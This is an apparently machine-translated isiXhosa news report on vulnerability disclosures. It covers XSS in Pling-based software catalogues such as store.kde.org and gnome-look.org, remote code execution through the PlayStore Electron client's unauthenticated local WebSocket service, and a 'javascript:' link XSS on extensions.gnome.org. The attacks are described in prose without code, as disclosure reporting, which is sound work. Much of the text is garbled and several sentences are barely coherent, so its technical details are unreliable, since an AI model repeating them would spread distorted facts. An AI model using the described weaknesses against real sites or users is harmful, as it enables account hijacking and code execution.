Isiqalo esivela eBerlin Utyhile ubungozi bokwenza ikhowudi ekude (RCE) kunye nesikripthi sendawo enqamlezileyo (XSS) kuLuhlu, esetyenziswa kwiikhathalogu ezahlukeneyo zesicelo ezakhiwe kweli qonga kwaye ezinokuvumela ikhowudi yeJavaScript ukuba yenziwe kwimeko yabanye abasebenzisi. Iindawo ezichaphazelekayo zezinye zeekhathalogu zesicelo sasimahla sesoftware Njengevenkile.kde.org, appimagehub.com, gnome-look.org, xfce-look.org, pling.com phakathi kwabanye.
Ukhuseleko oluqinisekileyo, olufumene imingxunya, luthi iibugs zisekhona kwikhowudi yePlingi kwaye abagcini bayo abaphendulanga kwiingxelo zokuba semngciphekweni.
Kwangoko kulo nyaka, sijonge indlela ezithandwayo ngayo ii -apps zedesktop ezisebenzisa umsebenzisi kwaye safumana ukuba semngciphekweni kweekhowudi kuninzi lwazo. Olunye usetyenziso endikhe ndalukhangela yayiyi-KDE Discover App Store, eyajika yaphatha ii-URIs ezingathembekanga ngendlela engakhuselekanga (CVE-2021-28117, KDE Security Advisory).
Endleleni, ndakhawuleza ndafumanisa ukuba sesichengeni kwezinye iimarike zesoftware yasimahla.
I-XSS enesiphene enokubakho kuhlaselo lonikezelo lweemarike kwiimarike ezisekwe kwi-Pling kunye nokuqhutywa yi-RCE echaphazela abasebenzisi besicelo sePlayStore basenokuxhatshazwa.
Ukubeka kubonakala njengendawo yentengiso yabayili yokulayisha imixholo kunye nemizobo Idesktop yeLinux, phakathi kwezinye izinto, ngethemba lokufumana inzuzo kubaxhasi. Izahlulo ezibini: ikhowudi efunekayo ukuqhuba i-bazaar yabo ye-bling kunye nesicelo esisekwe kwi-Electron abanokuyifaka ukulawula imixholo yabo kwi-Pling souk. Ikhowudi yewebhu ine-XSS kwaye umxhasi une-XSS kunye ne-RCE. Ukubeka amandla kwiindawo ezininzi, ukusuka ku-pling.com kunye nevenkile.kde.org ukuya ku-gnome-look.org nakwi-xfce-look.org.
Undoqo wengxaki lelo qonga Ukucwangciswa kuvumela ukongezwa kweebhloko ze-multimedia kwifomathi ye-HTML, umzekelo, ukufaka ividiyo ye-YouTube okanye umfanekiso. Ikhowudi eyongezwe ngale fomu ayiqinisekiswanga ngokuchanekileyo, yintoni ikuvumela ukuba ungeze ikhowudi enobungozi phantsi komfanekiso kwaye ubeke ulwazi kulawulo oluza kwenziwa yikhowudi yeJavaScript xa ujongwa. Ukuba ulwazi luya kuvulelwa abasebenzisi abaneakhawunti, kunokwenzeka ukuba baqalise isenzo kulawulo egameni lomsebenzisi, kubandakanya ukongeza umnxeba weJavaScript kumaphepha abo, ukumilisela uhlobo lwe-worm yenethiwekhi.
Kwakhona, ubungozi buchongiwe kwisicelo sePlayStore, kubhaliwe kusetyenziswa iqonga le-Electron kunye nokuvumela ukuba uhambe kwiikhombisi ze-OpenDesktop ngaphandle kwesikhangeli kwaye ufake iipakeji ezinikwe apho. Ukuba semngciphekweni kwiPlayStore kuvumela ikhowudi yayo ukuba isebenze kwinkqubo yomsebenzisi.
Xa isicelo sePlayStore sisebenza, inkqubo yomphathi we-ocs iyaqalwa, Ukwamkela unxibelelwano lwasekhaya ngeWebSocket kunye nokuqhuba imiyalelo njengokulayisha kunye nokwazisa usetyenziso kwifomathi yeAppImage. Imiyalelo kulindeleke ukuba idluliswe sisicelo sePlayStore, kodwa enyanisweni, ngenxa yokunqongophala kokuqinisekiswa, isicelo singathunyelwa kumphathi we-ocs kwisikhangeli somsebenzisi. Ukuba umsebenzisi uvula indawo enobungozi, banokuqalisa unxibelelwano nomphathi we-ocs kwaye basebenzise ikhowudi kwinkqubo yomsebenzisi.
Ukuba semngciphekweni kweXSS kukwabikwa kulawulo lwe extensions.gnome.org; Kwintsimi ene-URL yephepha lasekhaya leplagi, ungakhankanya ikhowudi yeJavaScript kwifomathi "ijavascript: ikhowudi" kwaye xa ucofa ikhonkco, iJavaScript echaziweyo iya kumiliselwa endaweni yokuvula indawo yeprojekthi.
Kwelinye icala, Ingxaki iyaqikelela, kuba indawo ekwikhombisi ye extensions.gnome.org iyamodareyithwa kwaye uhlaselo alufuni kuvulwa iphepha elithile kuphela, kodwa nokucofa okucacileyo kwikhonkco. Kwelinye icala, ngexesha lokuqinisekisa, imodareyitha inokufuna ukuya kwindawo yeprojekthi, ingayinaki ifom yekhonkco, kwaye isebenzise ikhowudi yeJavaScript kwimeko yeakhawunti yazo.
Okokugqibela, ukuba unomdla wokwazi okungakumbi ngayo, unokuthetha iinkcukacha kwikhonkco elilandelayo.